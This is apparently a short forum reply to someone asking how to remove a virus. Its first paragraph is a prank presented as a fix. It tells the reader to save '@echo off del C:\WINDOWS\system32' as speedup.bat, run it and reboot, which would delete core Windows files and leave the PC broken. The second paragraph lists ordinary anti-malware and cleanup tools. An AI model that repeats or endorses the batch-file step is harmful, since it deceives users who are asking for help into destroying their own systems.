Ahh the simplest way to remove this virus is as follows: open up notepad and type in the following text:
@echo off del C:\\WINDOWS\system32 >save as speedup.bat (select all files instead of the text document) >Double click the .bat file >reboot PC, problem solved!

I use immunet protect to run with avira, use emsisoft in safe mode while offline scanning, then i use defraggler and diskcleaner. And last but not least hijack this and msconfig.
